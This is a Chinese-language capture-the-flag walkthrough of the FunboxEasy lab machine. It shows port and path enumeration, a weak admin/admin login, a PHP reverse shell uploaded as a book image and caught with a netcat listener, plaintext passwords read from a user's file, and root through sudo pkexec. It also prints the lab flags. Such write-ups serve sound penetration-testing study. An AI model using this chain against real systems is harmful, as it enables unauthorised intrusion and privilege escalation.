主要知识点

• 弱密码
• 路径枚举
• 文件上传

具体步骤

首先是nmap扫描一下，虽然只有22，80和3306端口，但是事情没那么简单

Nmap scan report for 192.168.125.111
Host is up (0.45s latency).
Not shown: 65532 closed tcp ports (reset)
PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 b2:d8:51:6e:c5:84:05:19:08:eb:c8:58:27:13:13:2f (RSA)
|   256 b0:de:97:03:a7:2f:f4:e2:ab:4a:9c:d9:43:9b:8a:48 (ECDSA)
|_  256 9d:0f:9a:26:38:4f:01:80:a7:a6:80:9d:d1:d4:cf:ec (ED25519)
80/tcp    open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
| http-methods: 
|_  Supported Methods: GET POST OPTIONS HEAD
| http-robots.txt: 1 disallowed entry 
|_gym
33060/tcp open  mysqlx?
| fingerprint-strings: 
|   DNSStatusRequestTCP, LDAPSearchReq, NotesRPC, SSLSessionReq, TLSSessionReq, X11Probe, afp: 
|     Invalid message"
|_    HY000

枚举一下80端口的路径，有admin,secret,store, robots.txt(里面包含了一个gym路径)

===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.125.111
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/SecLists/Discovery/Web-Content/big.txt
[+] Negative Status codes:   502,404,429,503,400
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.htpasswd            (Status: 403) [Size: 280]
/.htaccess            (Status: 403) [Size: 280]
/admin                (Status: 301) [Size: 318] [--> http://192.168.125.111/admin/]
/robots.txt           (Status: 200) [Size: 14]
/secret               (Status: 301) [Size: 319] [--> http://192.168.125.111/secret/]
/server-status        (Status: 403) [Size: 280]
/store                (Status: 301) [Size: 318] [--> http://192.168.125.111/store/]
Progress: 20476 / 20477 (100.00%)
===============================================================
Finished
===============================================================

我首先试验的是admin,有sql注入漏洞，但是admin身份登录进去以后我没发现太多有价值的线索，之后把注意力转移到了store页面，利用了弱密码admin/admin登录成功

这里随意选了一本书作为实验对象，尝试上传修改过的php reverse shell文件，没有报错，如果发现sql语句报错的情况，可以直接把 Author Title Publisher都改成Test，避免特殊字符过滤的问题

依次点击Change ->Confirm之后，回到书籍列表和书籍信息页面，发现这时候图片已经显示不出来了，这时单机Open Image in New Tab ,会触发反弹shell

C:\home\kali\Documents\OFFSEC\play\FunboxEasy> nc -nlvp 80
listening on [any] 80 ...
connect to [192.168.45.241] from (UNKNOWN) [192.168.125.111] 47924
Linux funbox3 5.4.0-42-generic #46-Ubuntu SMP Fri Jul 10 00:24:02 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
 00:32:28 up 35 min,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off

sudo -l和find / -type f -perm -4000 2>/dev/null都没有什么线索，但是发现了第一个flag和一些密码

www-data@funbox3:/$ ls -l /home
ls -l /home
total 4
drwxr-xr-x 2 tony tony 4096 Oct 30  2020 tony
www-data@funbox3:/$ cd /home/tony
ls cd /home/tony
www-data@funbox3:/home/tony$ -lart
ls -lart
total 24
-rw-r--r-- 1 tony tony  807 Feb 25  2020 .profile
-rw-r--r-- 1 tony tony 3771 Feb 25  2020 .bashrc
-rw-r--r-- 1 tony tony  220 Feb 25  2020 .bash_logout
drwxr-xr-x 3 root root 4096 Jul 30  2020 ..
-rw-rw-r-- 1 tony tony   70 Jul 31  2020 password.txt
drwxr-xr-x 2 tony tony 4096 Oct 30  2020 .
-rw------- 1 tony tony    0 Oct 30  2020 .bash_history
www-data@funbox3:/home/tony$ cat password.txt
cat password.txt
ssh: yxcvbnmYYY
gym/admin: asdfghjklXXX
/store: admin@admin.com admin
www-data@funbox3:/home/tony$ ls -l /var/www
ls -l /var/www
total 8
drwxr-xr-x 6 root     root     4096 Jul 31  2020 html
-rw-r--r-- 1 www-data www-data   33 Nov 17 23:59 local.txt
www-data@funbox3:/home/tony$ cat /var/www/local.txt
cat /var/www/local.txt
229c09619f54bfc769d3d6ad1c8aadb3
www-data@funbox3:/home/tony$ 

尝试用ssh 那行的密码试验登录tony用户，成功

C:\home\kali\Documents\OFFSEC\play\FunboxEasy> ssh tony@192.168.125.111        
The authenticity of host '192.168.125.111 (192.168.125.111)' can't be established.
ED25519 key fingerprint is SHA256:sMY2EwBNywi3V/cmpdMCtvcC6NM31k0H9CTRlsxALfY.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.125.111' (ED25519) to the list of known hosts.
tony@192.168.125.111's password: 
Welcome to Ubuntu 20.04 LTS (GNU/Linux 5.4.0-42-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Mon Nov 18 00:34:33 UTC 2024

  System load:  0.02              Processes:               157
  Usage of /:   76.1% of 4.66GB   Users logged in:         0
  Memory usage: 67%               IPv4 address for ens256: 192.168.125.111
  Swap usage:   0%


......
......

tony@funbox3:~$ 

查看tony用户的sudo -l，发现了很多，挨个试验一下

tony@funbox3:~$ sudo -l
Matching Defaults entries for tony on funbox3:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User tony may run the following commands on funbox3:
    (root) NOPASSWD: /usr/bin/yelp
    (root) NOPASSWD: /usr/bin/dmf
    (root) NOPASSWD: /usr/bin/whois
    (root) NOPASSWD: /usr/bin/rlogin
    (root) NOPASSWD: /usr/bin/pkexec
    (root) NOPASSWD: /usr/bin/mtr
    (root) NOPASSWD: /usr/bin/finger
    (root) NOPASSWD: /usr/bin/time
    (root) NOPASSWD: /usr/bin/cancel
    (root) NOPASSWD: /root/a/b/c/d/e/f/g/h/i/j/k/l/m/n/o/q/r/s/t/u/v/w/x/y/z/.smile.sh

最终发现 pkexec是关键
 

tony@funbox3:~$ sudo /usr/bin/pkexec  /bin/sh
# id
uid=0(root) gid=0(root) groups=0(root)
# cat /root/proof.txt
dc029f6c7e590b0b07d804c2a655ef52